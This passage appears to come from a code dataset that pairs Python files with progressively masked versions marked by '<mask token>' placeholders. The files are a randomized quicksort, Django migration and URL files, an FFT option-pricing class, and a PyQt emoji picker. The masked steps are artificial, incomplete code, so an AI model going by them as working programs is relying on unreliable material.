elif array[j] == pivot:\n end += 1\n array[end], array[j] = array[j], array[end]\n array[end + 1], array[right] = array[right], array[end + 1]\n return begin + 1, end + 1\n\n\ndef randomized_quick_sort(array, left, right):\n if left >= right:\n return\n k = randint(left, right)\n array[left], array[k] = array[k], array[left]\n small, equal = partition3(array, left, right)\n randomized_quick_sort(array, left, small - 1)\n randomized_quick_sort(array, equal + 1, right)\n\n\nif __name__ == '__main__':\n input_n = int(input())\n elements = list(map(int, input().split()))\n assert len(elements) == input_n\n randomized_quick_sort(elements, 0, len(elements) - 1)\n print(*elements)\n", "step-4": "from random import randint\n\n\ndef partition3(array, left, right):\n pivot = array[right]\n begin = left - 1\n end = left - 1\n for j in range(left, right):\n if array[j] < pivot:\n begin += 1\n array[begin], array[j] = array[j], array[begin]\n end += 1\n if array[j] == pivot:\n array[end], array[j] = array[j], array[end]\n elif array[j] == pivot:\n end += 1\n array[end], array[j] = array[j], array[end]\n array[end + 1], array[right] = array[right], array[end + 1]\n return begin + 1, end + 1\n\n\ndef randomized_quick_sort(array, left, right):\n if left >= right:\n return\n k = randint(left, right)\n array[left], array[k] = array[k], array[left]\n small, equal = partition3(array, left, right)\n randomized_quick_sort(array, left, small - 1)\n randomized_quick_sort(array, equal + 1, right)\n\n\nif __name__ == '__main__':\n input_n = int(input())\n elements = list(map(int, input().split()))\n assert len(elements) == input_n\n randomized_quick_sort(elements, 0, len(elements) - 1)\n print(*elements)\n", "step-5": "# python3\n\nfrom random import randint\n\n\ndef partition3(array, left, right):\n pivot = array[right]\n begin = left - 1\n end = left - 1\n for j in range(left, right):\n if array[j] < pivot:\n begin += 1\n array[begin], array[j] = array[j], array[begin]\n end += 1\n if array[j] == pivot:\n array[end], array[j] = array[j], array[end]\n elif array[j] == pivot:\n end += 1\n array[end], array[j] = array[j], array[end]\n\n array[end + 1], array[right] = array[right], array[end + 1]\n return begin + 1, end + 1\n\ndef randomized_quick_sort(array, left, right):\n if left >= right:\n return\n k = randint(left, right)\n array[left], array[k] = array[k], array[left]\n\n small, equal = partition3(array, left, right)\n randomized_quick_sort(array, left, small - 1)\n randomized_quick_sort(array, equal + 1, right)\n\n\nif __name__ == '__main__':\n input_n = int(input())\n elements = list(map(int, input().split()))\n assert len(elements) == input_n\n randomized_quick_sort(elements, 0, len(elements) - 1)\n print(*elements)\n", "step-ids": [ 0, 2, 3, 4, 5 ] }
[ 0, 2, 3, 4, 5 ]
# Generated by Django 3.2.3 on 2021-06-01 07:26 from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('info', '0002_auto_20210531_1958'), ] operations = [ migrations.AddField( model_name='well', name='well_status', field=models.CharField(choices=[('0', 'Бурение'), ('1', 'Освоение'), ('2', 'Бездействие'), ('3', 'Простой')], default='2', max_length=15, verbose_name='Статус скважины'), ), ]
normal
{ "blob_id": "a3239bbe4f85c9f0e1bc845245f024c3feb64923", "index": 7476, "step-1": "<mask token>\n", "step-2": "<mask token>\n\n\nclass Migration(migrations.Migration):\n <mask token>\n <mask token>\n", "step-3": "<mask token>\n\n\nclass Migration(migrations.Migration):\n dependencies = [('info', '0002_auto_20210531_1958')]\n operations = [migrations.AddField(model_name='well', name='well_status',\n field=models.CharField(choices=[('0', 'Бурение'), ('1', 'Освоение'),\n ('2', 'Бездействие'), ('3', 'Простой')], default='2', max_length=15,\n verbose_name='Статус скважины'))]\n", "step-4": "from django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n dependencies = [('info', '0002_auto_20210531_1958')]\n operations = [migrations.AddField(model_name='well', name='well_status',\n field=models.CharField(choices=[('0', 'Бурение'), ('1', 'Освоение'),\n ('2', 'Бездействие'), ('3', 'Простой')], default='2', max_length=15,\n verbose_name='Статус скважины'))]\n", "step-5": "# Generated by Django 3.2.3 on 2021-06-01 07:26\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('info', '0002_auto_20210531_1958'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='well',\n name='well_status',\n field=models.CharField(choices=[('0', 'Бурение'), ('1', 'Освоение'), ('2', 'Бездействие'), ('3', 'Простой')], default='2', max_length=15, verbose_name='Статус скважины'),\n ),\n ]\n", "step-ids": [ 0, 1, 2, 3, 4 ] }
[ 0, 1, 2, 3, 4 ]
#!/usr/bin/env python3 # -*- coding: utf-8 -*- """ Created on Thu Nov 14 01:32:26 2019 @author: himanshu """ import numpy as np from scipy.interpolate import interp1d from option import Option class FFTPricing: def __init__(self, option : Option, riskFreeRate, volatility, samplePoints, bandwidth, dampingFactor, underlyingModel = 'GBM'): self.__option = option self.__r = riskFreeRate self.__sigma = volatility self.__N = samplePoints self.__B = bandwidth self.__alpha = dampingFactor self.__model = underlyingModel # Computes the characterstic function of a GBM. def __charactersticFunc(self, omega): S0 = self.__option.underlyingPrice r = self.__r T = self.__option.timeToExpiry sigma = self.__sigma alpha = self.__alpha if self.__model == 'GBM': x0 = np.log(S0) mu = x0 + ((r - (sigma**2)/2)*(T)) sig = (sigma**2)*(T)/2 omega_prime = omega + 1j*(alpha+1) return np.exp(-1j*mu*omega_prime - sig*(omega_prime**2)) elif self.__model == 'VG': pass # Computes the Fourier Transform of a GBM. def __fourierTransform(self, omega): alpha = self.__alpha r = self.__r T = self.__option.timeToExpiry q_hat = self.__charactersticFunc(omega) num = np.exp(-r*(T))*q_hat den = (alpha - 1j*omega)*(alpha - (1j*omega) + 1) return num/den def optionPrice(self): if not self.__option.expiryType == 'European': print('Not a European Option') return 0.0 K = self.__option.strikePrice N = self.__N B = self.__B alpha = self.__alpha h = B/(N-1) omega = np.arange(0,N)*h dk = 2*np.pi/(h*N) k = np.log(20) + np.arange(0,N)*dk dw = np.zeros(N) dw[0] = h/2 dw[1:] = h # FFT Algorithm V = np.zeros(N) for n in range(N): nu_hat = self.__fourierTransform(omega) inner_sum = np.sum(np.exp(1j*omega*k[n])*nu_hat*dw) V[n] = ((np.exp(-alpha*k[n])/np.pi)*inner_sum).real val = interp1d(k, V) return float('{0:.2f}'.format(val(np.log(K)))) def __repr__(self): return "FFTPricing({}, {}, {}, {}, {}, {})"\ .format(self.__option, self.__r, self.__sigma, self.__N, self.__B, self.__alpha) if __name__ == "__main__": from option import European S0 = 100 K = 110 r = 0.10 T = 1 volatility = 0.25 N = 2**10 B = 50 alpha = 10.0 print('------------------------------------------------------------------' +'----------------------------') option = European(S0, K, T, 'Call') fftPricing = FFTPricing(option, r, volatility, N, B, alpha) print(fftPricing) print('FFT price for Call:', fftPricing.optionPrice()) print('------------------------------------------------------------------' +'----------------------------') option = European(S0, K, T, 'Put') fftPricing = FFTPricing(option, r, volatility, N, B, -alpha) print(fftPricing) print('FFT price for Put:', fftPricing.optionPrice())
normal
{ "blob_id": "25987c15c28e3939f9f531dbc1d4bd9bf622b5a9", "index": 5691, "step-1": "<mask token>\n\n\nclass FFTPricing:\n\n def __init__(self, option: Option, riskFreeRate, volatility,\n samplePoints, bandwidth, dampingFactor, underlyingModel='GBM'):\n self.__option = option\n self.__r = riskFreeRate\n self.__sigma = volatility\n self.__N = samplePoints\n self.__B = bandwidth\n self.__alpha = dampingFactor\n self.__model = underlyingModel\n <mask token>\n\n def __fourierTransform(self, omega):\n alpha = self.__alpha\n r = self.__r\n T = self.__option.timeToExpiry\n q_hat = self.__charactersticFunc(omega)\n num = np.exp(-r * T) * q_hat\n den = (alpha - 1.0j * omega) * (alpha - 1.0j * omega + 1)\n return num / den\n\n def optionPrice(self):\n if not self.__option.expiryType == 'European':\n print('Not a European Option')\n return 0.0\n K = self.__option.strikePrice\n N = self.__N\n B = self.__B\n alpha = self.__alpha\n h = B / (N - 1)\n omega = np.arange(0, N) * h\n dk = 2 * np.pi / (h * N)\n k = np.log(20) + np.arange(0, N) * dk\n dw = np.zeros(N)\n dw[0] = h / 2\n dw[1:] = h\n V = np.zeros(N)\n for n in range(N):\n nu_hat = self.__fourierTransform(omega)\n inner_sum = np.sum(np.exp(1.0j * omega * k[n]) * nu_hat * dw)\n V[n] = (np.exp(-alpha * k[n]) / np.pi * inner_sum).real\n val = interp1d(k, V)\n return float('{0:.2f}'.format(val(np.log(K))))\n\n def __repr__(self):\n return 'FFTPricing({}, {}, {}, {}, {}, {})'.format(self.__option,\n self.__r, self.__sigma, self.__N, self.__B, self.__alpha)\n\n\n<mask token>\n", "step-2": "<mask token>\n\n\nclass FFTPricing:\n\n def __init__(self, option: Option, riskFreeRate, volatility,\n samplePoints, bandwidth, dampingFactor, underlyingModel='GBM'):\n self.__option = option\n self.__r = riskFreeRate\n self.__sigma = volatility\n self.__N = samplePoints\n self.__B = bandwidth\n self.__alpha = dampingFactor\n self.__model = underlyingModel\n\n def __charactersticFunc(self, omega):\n S0 = self.__option.underlyingPrice\n r = self.__r\n T = self.__option.timeToExpiry\n sigma = self.__sigma\n alpha = self.__alpha\n if self.__model == 'GBM':\n x0 = np.log(S0)\n mu = x0 + (r - sigma ** 2 / 2) * T\n sig = sigma ** 2 * T / 2\n omega_prime = omega + 1.0j * (alpha + 1)\n return np.exp(-1.0j * mu * omega_prime - sig * omega_prime ** 2)\n elif self.__model == 'VG':\n pass\n\n def __fourierTransform(self, omega):\n alpha = self.__alpha\n r = self.__r\n T = self.__option.timeToExpiry\n q_hat = self.__charactersticFunc(omega)\n num = np.exp(-r * T) * q_hat\n den = (alpha - 1.0j * omega) * (alpha - 1.0j * omega + 1)\n return num / den\n\n def optionPrice(self):\n if not self.__option.expiryType == 'European':\n print('Not a European Option')\n return 0.0\n K = self.__option.strikePrice\n N = self.__N\n B = self.__B\n alpha = self.__alpha\n h = B / (N - 1)\n omega = np.arange(0, N) * h\n dk = 2 * np.pi / (h * N)\n k = np.log(20) + np.arange(0, N) * dk\n dw = np.zeros(N)\n dw[0] = h / 2\n dw[1:] = h\n V = np.zeros(N)\n for n in range(N):\n nu_hat = self.__fourierTransform(omega)\n inner_sum = np.sum(np.exp(1.0j * omega * k[n]) * nu_hat * dw)\n V[n] = (np.exp(-alpha * k[n]) / np.pi * inner_sum).real\n val = interp1d(k, V)\n return float('{0:.2f}'.format(val(np.log(K))))\n\n def __repr__(self):\n return 'FFTPricing({}, {}, {}, {}, {}, {})'.format(self.__option,\n self.__r, self.__sigma, self.__N, self.__B, self.__alpha)\n\n\n<mask token>\n", "step-3": "<mask token>\n\n\nclass FFTPricing:\n\n def __init__(self, option: Option, riskFreeRate, volatility,\n samplePoints, bandwidth, dampingFactor, underlyingModel='GBM'):\n self.__option = option\n self.__r = riskFreeRate\n self.__sigma = volatility\n self.__N = samplePoints\n self.__B = bandwidth\n self.__alpha = dampingFactor\n self.__model = underlyingModel\n\n def __charactersticFunc(self, omega):\n S0 = self.__option.underlyingPrice\n r = self.__r\n T = self.__option.timeToExpiry\n sigma = self.__sigma\n alpha = self.__alpha\n if self.__model == 'GBM':\n x0 = np.log(S0)\n mu = x0 + (r - sigma ** 2 / 2) * T\n sig = sigma ** 2 * T / 2\n omega_prime = omega + 1.0j * (alpha + 1)\n return np.exp(-1.0j * mu * omega_prime - sig * omega_prime ** 2)\n elif self.__model == 'VG':\n pass\n\n def __fourierTransform(self, omega):\n alpha = self.__alpha\n r = self.__r\n T = self.__option.timeToExpiry\n q_hat = self.__charactersticFunc(omega)\n num = np.exp(-r * T) * q_hat\n den = (alpha - 1.0j * omega) * (alpha - 1.0j * omega + 1)\n return num / den\n\n def optionPrice(self):\n if not self.__option.expiryType == 'European':\n print('Not a European Option')\n return 0.0\n K = self.__option.strikePrice\n N = self.__N\n B = self.__B\n alpha = self.__alpha\n h = B / (N - 1)\n omega = np.arange(0, N) * h\n dk = 2 * np.pi / (h * N)\n k = np.log(20) + np.arange(0, N) * dk\n dw = np.zeros(N)\n dw[0] = h / 2\n dw[1:] = h\n V = np.zeros(N)\n for n in range(N):\n nu_hat = self.__fourierTransform(omega)\n inner_sum = np.sum(np.exp(1.0j * omega * k[n]) * nu_hat * dw)\n V[n] = (np.exp(-alpha * k[n]) / np.pi * inner_sum).real\n val = interp1d(k, V)\n return float('{0:.2f}'.format(val(np.log(K))))\n\n def __repr__(self):\n return 'FFTPricing({}, {}, {}, {}, {}, {})'.format(self.__option,\n self.__r, self.__sigma, self.__N, self.__B, self.__alpha)\n\n\nif __name__ == '__main__':\n from option import European\n S0 = 100\n K = 110\n r = 0.1\n T = 1\n volatility = 0.25\n N = 2 ** 10\n B = 50\n alpha = 10.0\n print(\n '------------------------------------------------------------------' +\n '----------------------------')\n option = European(S0, K, T, 'Call')\n fftPricing = FFTPricing(option, r, volatility, N, B, alpha)\n print(fftPricing)\n print('FFT price for Call:', fftPricing.optionPrice())\n print(\n '------------------------------------------------------------------' +\n '----------------------------')\n option = European(S0, K, T, 'Put')\n fftPricing = FFTPricing(option, r, volatility, N, B, -alpha)\n print(fftPricing)\n print('FFT price for Put:', fftPricing.optionPrice())\n", "step-4": "<mask token>\nimport numpy as np\nfrom scipy.interpolate import interp1d\nfrom option import Option\n\n\nclass FFTPricing:\n\n def __init__(self, option: Option, riskFreeRate, volatility,\n samplePoints, bandwidth, dampingFactor, underlyingModel='GBM'):\n self.__option = option\n self.__r = riskFreeRate\n self.__sigma = volatility\n self.__N = samplePoints\n self.__B = bandwidth\n self.__alpha = dampingFactor\n self.__model = underlyingModel\n\n def __charactersticFunc(self, omega):\n S0 = self.__option.underlyingPrice\n r = self.__r\n T = self.__option.timeToExpiry\n sigma = self.__sigma\n alpha = self.__alpha\n if self.__model == 'GBM':\n x0 = np.log(S0)\n mu = x0 + (r - sigma ** 2 / 2) * T\n sig = sigma ** 2 * T / 2\n omega_prime = omega + 1.0j * (alpha + 1)\n return np.exp(-1.0j * mu * omega_prime - sig * omega_prime ** 2)\n elif self.__model == 'VG':\n pass\n\n def __fourierTransform(self, omega):\n alpha = self.__alpha\n r = self.__r\n T = self.__option.timeToExpiry\n q_hat = self.__charactersticFunc(omega)\n num = np.exp(-r * T) * q_hat\n den = (alpha - 1.0j * omega) * (alpha - 1.0j * omega + 1)\n return num / den\n\n def optionPrice(self):\n if not self.__option.expiryType == 'European':\n print('Not a European Option')\n return 0.0\n K = self.__option.strikePrice\n N = self.__N\n B = self.__B\n alpha = self.__alpha\n h = B / (N - 1)\n omega = np.arange(0, N) * h\n dk = 2 * np.pi / (h * N)\n k = np.log(20) + np.arange(0, N) * dk\n dw = np.zeros(N)\n dw[0] = h / 2\n dw[1:] = h\n V = np.zeros(N)\n for n in range(N):\n nu_hat = self.__fourierTransform(omega)\n inner_sum = np.sum(np.exp(1.0j * omega * k[n]) * nu_hat * dw)\n V[n] = (np.exp(-alpha * k[n]) / np.pi * inner_sum).real\n val = interp1d(k, V)\n return float('{0:.2f}'.format(val(np.log(K))))\n\n def __repr__(self):\n return 'FFTPricing({}, {}, {}, {}, {}, {})'.format(self.__option,\n self.__r, self.__sigma, self.__N, self.__B, self.__alpha)\n\n\nif __name__ == '__main__':\n from option import European\n S0 = 100\n K = 110\n r = 0.1\n T = 1\n volatility = 0.25\n N = 2 ** 10\n B = 50\n alpha = 10.0\n print(\n '------------------------------------------------------------------' +\n '----------------------------')\n option = European(S0, K, T, 'Call')\n fftPricing = FFTPricing(option, r, volatility, N, B, alpha)\n print(fftPricing)\n print('FFT price for Call:', fftPricing.optionPrice())\n print(\n '------------------------------------------------------------------' +\n '----------------------------')\n option = European(S0, K, T, 'Put')\n fftPricing = FFTPricing(option, r, volatility, N, B, -alpha)\n print(fftPricing)\n print('FFT price for Put:', fftPricing.optionPrice())\n", "step-5": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Nov 14 01:32:26 2019\n\n@author: himanshu\n\"\"\"\n\nimport numpy as np\nfrom scipy.interpolate import interp1d\nfrom option import Option\n\nclass FFTPricing:\n \n def __init__(self,\n option : Option,\n riskFreeRate,\n volatility,\n samplePoints,\n bandwidth,\n dampingFactor,\n underlyingModel = 'GBM'):\n \n self.__option = option\n self.__r = riskFreeRate\n self.__sigma = volatility\n self.__N = samplePoints\n self.__B = bandwidth\n self.__alpha = dampingFactor\n self.__model = underlyingModel\n \n \n # Computes the characterstic function of a GBM.\n def __charactersticFunc(self, omega):\n S0 = self.__option.underlyingPrice\n r = self.__r\n T = self.__option.timeToExpiry\n sigma = self.__sigma\n alpha = self.__alpha\n \n if self.__model == 'GBM':\n x0 = np.log(S0)\n mu = x0 + ((r - (sigma**2)/2)*(T))\n sig = (sigma**2)*(T)/2\n omega_prime = omega + 1j*(alpha+1)\n return np.exp(-1j*mu*omega_prime - sig*(omega_prime**2))\n elif self.__model == 'VG':\n pass\n \n # Computes the Fourier Transform of a GBM.\n def __fourierTransform(self, omega):\n alpha = self.__alpha\n r = self.__r\n T = self.__option.timeToExpiry\n \n q_hat = self.__charactersticFunc(omega)\n num = np.exp(-r*(T))*q_hat\n den = (alpha - 1j*omega)*(alpha - (1j*omega) + 1)\n return num/den\n \n def optionPrice(self):\n if not self.__option.expiryType == 'European':\n print('Not a European Option')\n return 0.0\n \n K = self.__option.strikePrice\n \n N = self.__N\n B = self.__B\n alpha = self.__alpha\n \n h = B/(N-1)\n omega = np.arange(0,N)*h\n \n dk = 2*np.pi/(h*N)\n k = np.log(20) + np.arange(0,N)*dk\n \n dw = np.zeros(N)\n dw[0] = h/2\n dw[1:] = h\n \n # FFT Algorithm\n V = np.zeros(N)\n for n in range(N):\n nu_hat = self.__fourierTransform(omega)\n inner_sum = np.sum(np.exp(1j*omega*k[n])*nu_hat*dw)\n V[n] = ((np.exp(-alpha*k[n])/np.pi)*inner_sum).real\n \n val = interp1d(k, V)\n return float('{0:.2f}'.format(val(np.log(K))))\n \n def __repr__(self):\n \n return \"FFTPricing({}, {}, {}, {}, {}, {})\"\\\n .format(self.__option,\n self.__r,\n self.__sigma,\n self.__N,\n self.__B,\n self.__alpha)\n \nif __name__ == \"__main__\":\n from option import European\n S0 = 100\n K = 110\n r = 0.10\n T = 1\n volatility = 0.25\n \n N = 2**10\n B = 50\n alpha = 10.0\n \n print('------------------------------------------------------------------'\n +'----------------------------')\n option = European(S0, K, T, 'Call')\n fftPricing = FFTPricing(option, r, volatility, N, B, alpha)\n print(fftPricing)\n print('FFT price for Call:', fftPricing.optionPrice())\n \n print('------------------------------------------------------------------'\n +'----------------------------')\n option = European(S0, K, T, 'Put')\n fftPricing = FFTPricing(option, r, volatility, N, B, -alpha)\n print(fftPricing)\n print('FFT price for Put:', fftPricing.optionPrice())\n ", "step-ids": [ 5, 6, 7, 8, 9 ] }
[ 5, 6, 7, 8, 9 ]
from django.conf.urls import url from . import views urlpatterns = [ url(r'^class/([^/]+)/?$', views.puppet_class, name='puppet-class'), url(r'^edit-host/(?P<fqdn>[^/]+)?/?$', views.edit_host, name='edit-host'), url(r'^add-host/(?P<fqdn>[^/]+)?/?$', views.add_host, name='add-host'), url(r'^delete/([^/]+)/?$', views.delete_host, name='delete-host'), url(r'^user/(?P<loginid>[^/]+)/?$', views.edit_user, name='edit-user'), # url(r'^add-host', views.add_host, name='add-host'), url(r'^', views.index, name='index'), ]
normal
{ "blob_id": "add56d52f3c88f814a166d12c3bc5a5906268864", "index": 484, "step-1": "<mask token>\n", "step-2": "<mask token>\nurlpatterns = [url('^class/([^/]+)/?$', views.puppet_class, name=\n 'puppet-class'), url('^edit-host/(?P<fqdn>[^/]+)?/?$', views.edit_host,\n name='edit-host'), url('^add-host/(?P<fqdn>[^/]+)?/?$', views.add_host,\n name='add-host'), url('^delete/([^/]+)/?$', views.delete_host, name=\n 'delete-host'), url('^user/(?P<loginid>[^/]+)/?$', views.edit_user,\n name='edit-user'), url('^', views.index, name='index')]\n", "step-3": "from django.conf.urls import url\nfrom . import views\nurlpatterns = [url('^class/([^/]+)/?$', views.puppet_class, name=\n 'puppet-class'), url('^edit-host/(?P<fqdn>[^/]+)?/?$', views.edit_host,\n name='edit-host'), url('^add-host/(?P<fqdn>[^/]+)?/?$', views.add_host,\n name='add-host'), url('^delete/([^/]+)/?$', views.delete_host, name=\n 'delete-host'), url('^user/(?P<loginid>[^/]+)/?$', views.edit_user,\n name='edit-user'), url('^', views.index, name='index')]\n", "step-4": "from django.conf.urls import url\n\nfrom . import views\n\nurlpatterns = [\n url(r'^class/([^/]+)/?$', views.puppet_class, name='puppet-class'),\n url(r'^edit-host/(?P<fqdn>[^/]+)?/?$', views.edit_host, name='edit-host'),\n url(r'^add-host/(?P<fqdn>[^/]+)?/?$', views.add_host, name='add-host'),\n url(r'^delete/([^/]+)/?$', views.delete_host, name='delete-host'),\n url(r'^user/(?P<loginid>[^/]+)/?$', views.edit_user, name='edit-user'),\n # url(r'^add-host', views.add_host, name='add-host'),\n url(r'^', views.index, name='index'),\n]\n", "step-5": null, "step-ids": [ 0, 1, 2, 3 ] }
[ 0, 1, 2, 3 ]
#!/usr/bin/python # Copyright (c) 2020 Maryushi3 import emoji_data_python as edp import sys import pyautogui from Xlib import display from PyQt5.QtWidgets import QApplication, QGridLayout, QLabel, QLineEdit, QScrollArea, QSizePolicy, QStackedLayout, QVBoxLayout, QWidget from PyQt5.QtCore import QEvent, QSettings, Qt, pyqtSignal from PyQt5.QtGui import QFont from PyQt5 import QtTest # globals emojiGridLayout = None mainWindow = None emojiGridColumnCount = 5 emojiGridRowCount = 4 emojiToShowCount = 0 fullRowsCount = 0 lastRowEmojiCount = 0 emojiFontSize = 20 selectedEmojiPosition = list((0,0)) willExitOnItsOwn = False selectedEmojiChar='' settingsFile = None historyList = [] foundAnyEmoji = True layoutStack = None font = QFont() font.setPointSize(emojiFontSize) # quits without a lag def quitNicely(): mainWindow.hide() quit() # gets mouse position from Xlib def mousePosition(): pointerData = display.Display().screen().root.query_pointer()._data return pointerData["root_x"], pointerData["root_y"] # copies and pastes selected emoji def execute_emoji(char): add_char_to_history(char) global willExitOnItsOwn willExitOnItsOwn = True mainWindow.hide() QApplication.clipboard().setText(char) pyautogui.hotkey("ctrl","v") QtTest.QTest.qWait(250) quit() # fills grid with given char list and takes care of layout and counting def fill_grid_with_char_list(charList): # for wraparound global emojiToShowCount global fullRowsCount global lastRowEmojiCount emojiToShowCount = min(len(charList),(emojiGridColumnCount*emojiGridRowCount)) fullRowsCount = emojiToShowCount//emojiGridColumnCount lastRowEmojiCount = emojiToShowCount%emojiGridColumnCount global foundAnyEmoji if emojiToShowCount>0: foundAnyEmoji = True layoutStack.setCurrentIndex(0) else: foundAnyEmoji = False layoutStack.setCurrentIndex(1) # clear grid global emojiGridLayout for i in reversed(range(emojiGridLayout.count())): emojiGridLayout.itemAt(i).widget().setParent(None) # fill with new chars rowIdx = 0 colIdx = 0 for emoji in charList: if rowIdx>emojiGridRowCount-1: break; label = QClickableLabel(emoji) label.clicked.connect(execute_emoji) label.setFont(font) label.setAlignment(Qt.AlignCenter) label.setMinimumHeight(49) emojiGridLayout.addWidget(label,rowIdx,colIdx) emojiGridLayout.setAlignment(label,Qt.AlignTop) if colIdx < emojiGridColumnCount-1: colIdx+=1 else: colIdx=0 rowIdx+=1 emojiGridLayout.setContentsMargins(0,0,0,0) emojiGridLayout.setHorizontalSpacing(0) emojiGridLayout.setVerticalSpacing(0) if emojiToShowCount>0: highlight_emoji([0,0]) # searches for emoji, and passes them to fill_grid_with_char_list def execute_search(text): selectedEmoji = (0,0) if not text or text.isspace(): fill_grid_with_history() return foundEmoji = edp.find_by_name(text) charList = [emoji.char for emoji in foundEmoji] fill_grid_with_char_list(charList) # handles what to do after hovering over a given label def emoji_hovered(hoveredLabel): parentGrid = hoveredLabel.parentWidget().layout() hoveredIndex = parentGrid.indexOf(hoveredLabel) hoveredRow, hoveredColumn, _, _ = parentGrid.getItemPosition(hoveredIndex) highlight_emoji([hoveredRow,hoveredColumn]) # selects, sets style and handles wraparound def highlight_emoji(newPosition): global selectedEmojiPosition # grid is filled to a full rectangle (last row fills the window horizontally) if lastRowEmojiCount==0: if newPosition[0]<0: newPosition[0]=fullRowsCount-1 elif newPosition[1]<0: newPosition[1]=emojiGridColumnCount-1 elif newPosition[0]>fullRowsCount-1: newPosition[0]=0 elif newPosition[1]>emojiGridColumnCount-1: newPosition[1]=0 # last row is not full else: #horizontal wraparound through RIGHT edge for full rows if (newPosition[0]<fullRowsCount) and (newPosition[1]>emojiGridColumnCount-1): newPosition[1]=0 #horizontal wraparound through LEFT edge for full rows elif (newPosition[0]<fullRowsCount) and (newPosition[1]<0): newPosition[1]=emojiGridColumnCount-1 #horizontal wraparound through right edge for NON FULL rows elif (newPosition[0]==fullRowsCount) and (newPosition[1]>lastRowEmojiCount-1) and ((selectedEmojiPosition[0]-newPosition[0])==0): newPosition[1]=0 #horizontal wraparound through LEFT edge for NON FULL rows elif (newPosition[0]>=fullRowsCount) and (newPosition[1]<0): newPosition[1]=lastRowEmojiCount-1 #vertical wraparound through BOTTOM edge for full cols elif (newPosition[0]>fullRowsCount) and (newPosition[1]<lastRowEmojiCount): newPosition[0]=0 #vertical wraparound through TOP edge for full cols elif (newPosition[0]<0) and (newPosition[1]<lastRowEmojiCount): newPosition[0]=fullRowsCount #vertical wraparound through BOTTOM edge for NON FULL cols elif (newPosition[0]>fullRowsCount-1) and (newPosition[1]>lastRowEmojiCount-1): newPosition[0]=0 #vertical wraparound through TOP edge for NON FULL cols elif (newPosition[0]<0) and (newPosition[1]>lastRowEmojiCount-1): newPosition[0]=fullRowsCount-1 oldPosition = selectedEmojiPosition selectedEmojiPosition = newPosition widgetToDeselect = emojiGridLayout.itemAtPosition(oldPosition[0],oldPosition[1]) if widgetToDeselect: widgetToDeselect = widgetToDeselect.widget() widgetToDeselect.setStyleSheet("") global selectedEmojiChar widgetToSelect = emojiGridLayout.itemAtPosition(selectedEmojiPosition[0],selectedEmojiPosition[1]) if widgetToSelect: widgetToSelect = widgetToSelect.widget() selectedEmojiChar = widgetToSelect.text() widgetToSelect.setStyleSheet("QLabel{background-color: palette(highlight);}") # handles direction where to move emoji selection def move_selection(direction): if direction=="right": highlight_emoji([sum(x) for x in zip(selectedEmojiPosition, [0,1])]) elif direction=="left": highlight_emoji([sum(x) for x in zip(selectedEmojiPosition, [0,-1])]) elif direction=="up": highlight_emoji([sum(x) for x in zip(selectedEmojiPosition, [-1,0])]) elif direction=="down": highlight_emoji([sum(x) for x in zip(selectedEmojiPosition, [1,0])]) # handles Esc def on_key(key): # test for a specific key if key == Qt.Key_Escape: quitNicely() # adds given emoji to history and saves it to config file def add_char_to_history(char): global settingsFile global historyList if not historyList: historyList = [char] else: if char in historyList: historyList.remove(char) tempList = [char] tempList.extend(historyList) historyList = tempList[:(emojiGridColumnCount*emojiGridRowCount)] settingsFile.setValue('history/history',historyList) # wrapper around filling the grid def fill_grid_with_history(): fill_grid_with_char_list(historyList) # main app window class with inits class EmojiPickerWindow(QWidget): def __init__(self): super().__init__() # focus handling self.installEventFilter(self) self.title = 'Emoji picker \(^o^)/' self.width = 281 self.height = 251 # start with text box centered at mouse pointer position self.left, self.top = mousePosition() self.left -= self.width//2 self.top += (24-self.height) self.initSettings() self.initUI() def initUI(self): # topmost window layout layout = QVBoxLayout() global layoutStack layoutStack = QStackedLayout() layoutStackWidget = QWidget() layoutStackWidget.setLayout(layoutStack) # scroll area setup shenanigans scrollArea = QScrollArea() gridWidget = QWidget() global emojiGridLayout emojiGridLayout = QGridLayout(gridWidget) emojiGridLayout.setAlignment(Qt.AlignTop | Qt.AlignLeft) # stretch grid to widget for col in range(emojiGridColumnCount): emojiGridLayout.setColumnStretch(col,1) for row in range(emojiGridRowCount): emojiGridLayout.setRowStretch(row,1) scrollArea.setWidget(gridWidget) scrollArea.setWidgetResizable(True) layoutStack.addWidget(scrollArea) # info to show when no emoji has been found noEmojiFoundLabel = QLabel("No emoji found 🙁") noEmojiFoundLabel.setAlignment(Qt.AlignCenter | Qt.AlignHCenter | Qt.AlignVCenter) layoutStack.addWidget(noEmojiFoundLabel) layout.addWidget(layoutStackWidget) # fill with a placeholder for now (smiling or smile) # execute_search('smil') fill_grid_with_history() # bottom text entry lineEdit = QLineEditWithArrows() lineEdit.textChanged.connect(execute_search) layout.addWidget(lineEdit) # align it to the bottom, so that it won't stay centered vertically layout.setAlignment(lineEdit, Qt.AlignBottom) self.setLayout(layout) self.setWindowTitle(self.title) self.setGeometry(self.left, self.top, self.width, self.height) self.setFixedSize(self.width, self.height) self.setWindowFlags(Qt.FramelessWindowHint | Qt.WindowStaysOnTopHint) # needed for filling the grid out from the outside global mainWindow mainWindow = self # esc handling self.keyPressed.connect(on_key) self.show() lineEdit.setFocus() def initSettings(self): global settingsFile global historyList settingsFile = QSettings("emoji-picker-qtpy", "history"); historyList = settingsFile.value('history/history') # key handling keyPressed = pyqtSignal(int) def keyPressEvent(self, event): super(EmojiPickerWindow, self).keyPressEvent(event) self.keyPressed.emit(event.key()) # focus handling global willExitOnItsOwn def eventFilter(self, object, event): if event.type()== QEvent.WindowDeactivate or event.type()== QEvent.FocusOut: if (not willExitOnItsOwn): quitNicely() return False # clickable label class QClickableLabel(QLabel): clicked=pyqtSignal(str) def __init__(self, parent=None): QLabel.__init__(self, parent) def mousePressEvent(self, ev): self.clicked.emit(self.text()) def enterEvent(self, ev): emoji_hovered(self) # keyboard handling override for QlineEdit class QLineEditWithArrows(QLineEdit): def keyPressEvent(self, ev): global selectedEmojiChar global foundAnyEmoji if(ev.key() == Qt.Key_Right): move_selection("right") if(ev.key() == Qt.Key_Left): move_selection("left") if(ev.key() == Qt.Key_Up): move_selection("up") if(ev.key() == Qt.Key_Down): move_selection("down") if(ev.key() == Qt.Key_Return or ev.key() == Qt.Key_Enter): if foundAnyEmoji: execute_emoji(selectedEmojiChar) else: quitNicely() if(ev.key() == Qt.Key_Tab): pass else: 